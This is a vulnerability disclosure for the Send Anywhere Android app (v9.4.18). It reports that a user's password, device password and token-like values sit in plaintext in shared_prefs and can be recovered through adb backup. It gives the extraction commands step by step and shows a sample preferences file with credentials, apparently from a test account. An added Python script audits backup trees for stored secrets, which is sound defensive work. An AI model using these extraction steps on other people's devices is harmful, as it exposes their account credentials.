- #Application: Send Anywhere
- #Platform: Android
- #Version: 9.4.18
- #Severity: Medium
- #Author: Loc Phan Van
- #Impact: A non-root user can recover a valid user's username/password and the user's access token from the shared_prefs folder
- POC:
- 1. Backup the application
- adb backup -f ~/sendanywhere.ab -noapk com.estmob.android.sendanywhere
- 2. Convert file sendanywhere.ab to sendanywhere.tar
- java -jar abe.jar unpack ~/sendanywhere.ab sendanywhere.tar ""
- 3. Extract file
- tar -xvf sendanywhere.tar
- 4. Look for user's credentials in /shared_prefs/sendanywhere_device.xml
- <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
- <map>
- <string name="user_password">P4ssw0rd123</string>
- <string name="device_id">1020427653131</string>
- <string name="device_password">J6h49M5JXZw5w</string>
- <string name="user_id">endertest@gmail.com</string>
- <string name="advertising_id">5cfc8beb-f3ff-4b0a-a408-f5059c412d82</string>
- </map>
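
A check for this class of finding, as an added example that is not part of the original paste or the vendor's code: it walks an extracted backup tree and flags preference entries whose key names suggest a stored secret, reporting only the value length. The key-name pattern, the function names and the sample values are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Key-name heuristic for stored secrets (an assumption of this example).
SENSITIVE = re.compile(r"pass(word|wd)?|token|secret|api_?key", re.I)
# "shared_prefs" is the folder named in the write-up; "sp" is the directory
# name adb full backups use for the same data inside the tar.
PREF_DIRS = {"shared_prefs", "sp"}

def audit_prefs_xml(data, source="<inline>"):
    """Flag non-empty <string> entries whose name looks like a secret."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []  # not a well-formed preferences file
    findings = []
    for node in root.iter("string"):
        name, value = node.get("name", ""), node.text or ""
        if value and SENSITIVE.search(name):
            # Report the length only, so the audit log does not leak the secret.
            findings.append({"file": source, "key": name, "length": len(value)})
    return findings

def audit_backup_tree(root_dir):
    """Audit every preferences XML file under an extracted backup."""
    findings = []
    for path in sorted(Path(root_dir).rglob("*.xml")):
        if path.parent.name in PREF_DIRS:
            findings += audit_prefs_xml(path.read_bytes(), str(path))
    return findings

# Constructed sample: same key names as the file in step 4, placeholder values.
SAMPLE = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="user_password">CONSTRUCTED-PLACEHOLDER</string>
    <string name="device_id">0000000000000</string>
    <string name="device_password">CONSTRUCTED-PLACEHOLDER</string>
    <string name="user_id">user@example.com</string>
    <string name="advertising_id">00000000-0000-0000-0000-000000000000</string>
</map>"""

if __name__ == "__main__":
    for f in audit_prefs_xml(SAMPLE):
        print(f"{f['file']}: plaintext value under '{f['key']}' ({f['length']} chars)")
```

Run `audit_backup_tree()` on the directory produced by step 3 as part of a release check; any finding means a secret is being written to preferences in a form that a device backup exposes.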